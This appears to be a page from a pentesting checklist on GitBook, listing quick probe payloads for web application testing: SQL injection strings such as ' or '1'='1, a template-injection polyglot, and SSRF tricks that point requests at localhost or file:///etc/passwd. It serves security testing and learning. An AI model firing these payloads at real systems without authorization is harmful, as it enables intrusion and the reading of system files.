🩸
Pentesting Checklist
  • 👀General Checklist
    • 👁️Recon & Scanning
      • Nmap Scan
    • 🌡️Services
      • SSH
      • FTP
      • Samba
      • Git
      • SNMP
    • ⚙️Reverse Engineering
      • General
      • Android apks
      • Windows Exe or .net binaries
  • 🐞Web Application Checklist
    • 🧠Web App Attack Techniques
      • Password Smuggling Attack
    • 😍Fuzzing with ffuf
    • 💄Directory Fuzzing
      • Using the tools
      • Wordlists to use
    • 👾Subdomain Fuzzing
      • Normal fuzzing
      • Finding through DNS
    • 🎯LFI/RCE
      • LFI
        • What to do once obtained
      • RCE
      • Misc
  • ☕Linux Checklist
    • Page 2
  • 🪟Windows Checklist
    • 💀Windows Connection Methods
  • 🖇️Tips & Tricks
    • Transferring Files
      • 🐧Linux
      • 📸Windows
    • Pivoting / Lateral Movement Techniques
      • proxychains
      • chisel
      • sshuttle
      • ligolo-ng
    • 🧩Fuzzing
    • 🙃Credential Brute-Forcing
  • 🍒Other useful resources:
    • Page 7
Powered by GitBook
On this page
  • SQL Injection
  • SSTI (Server Side Template Injection)
  • SSRF (Server Side Request Forgery)
  1. Web Application Checklist

Web App Attack Techniques

Good list of quick payloads to try to test for certain vulnerabilities in web applications.

SQL Injection

Try to test for an error or maybe a 500 Internal Server Error

'
')
"
")
admin'--
' or '1'='1
' or 1=1 --

Comments
--
/*
#

SSTI (Server Side Template Injection)

Good payload to test for different types of SSTI

${{<%[%'"}}%\.

SSRF (Server Side Request Forgery)

Use burpsuite and check if the reqest the site makes has a url that you can modify

You can check for internal ports open with this

  • http://randomsite.com to http://127.0.0.1:8000

Also try other wrappers

  • file:///etc/passwd

PreviousWindows Exe or .net binariesNextPassword Smuggling Attack

Last updated 6 months ago

🐞
🧠